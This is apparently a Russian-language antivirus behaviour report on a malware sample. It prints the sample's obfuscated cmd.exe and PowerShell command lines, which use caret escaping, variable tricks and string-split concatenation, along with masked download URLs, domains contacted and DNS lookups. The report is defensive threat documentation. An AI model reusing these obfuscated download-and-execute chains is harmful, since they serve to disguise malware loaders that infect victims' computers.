Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' wMic wMic wMic wMic & %C^o^m^Sp^Ec% /V /c set %XEoRbOicnQkkRGd%=uDulQjGtn&&set %vzjbCXmSX%=owe^r^s&&set %JArWlaziWzPNjBP%=onVHZIoDw&&set %MnosvSVlo%=p&&set %nPTr...
Сетевая активность
Подключается к
- 'me###mir.com':80
- 'th#####ertailoring.com':80
- 'th#####ertailoring.com':443
TCP
Запросы HTTP GET
- http://www.me###mir.com/mrjqKa/
- http://www.th#####ertailoring.com/j/
Другие
- 'th#####ertailoring.com':443
UDP
- DNS ASK me###mir.com
- DNS ASK th#####ertailoring.com
- DNS ASK na####iebozon.fr
- DNS ASK in#####eboxevents.com
- DNS ASK bi###re.com.cn
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' wMic wMic wMic wMic & %C^o^m^Sp^Ec% /V /c set %XEoRbOicnQkkRGd%=uDulQjGtn&&set %vzjbCXmSX%=owe^r^s&&set %JArWlaziWzPNjBP%=onVHZIoDw&&set %MnosvSVlo%=p&&set %nPTr...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' " (' & ( PxbS'+'hEllid[1]+PxbSHel'+'LiD[13]+qm2xqm2) ((qm2 &( 3bMENV:CoMqm2+qm2speC[4,26,25]-JOinY2hY2h)( (Y2hzY2h+Y2hJlY2h+'+'Y2hfrY2h+Y2hanc Y2h+Y2h= newY2h+Y2h-oY2h+Y2hbY2h+Y2hjeY2h+Y2hct SY...
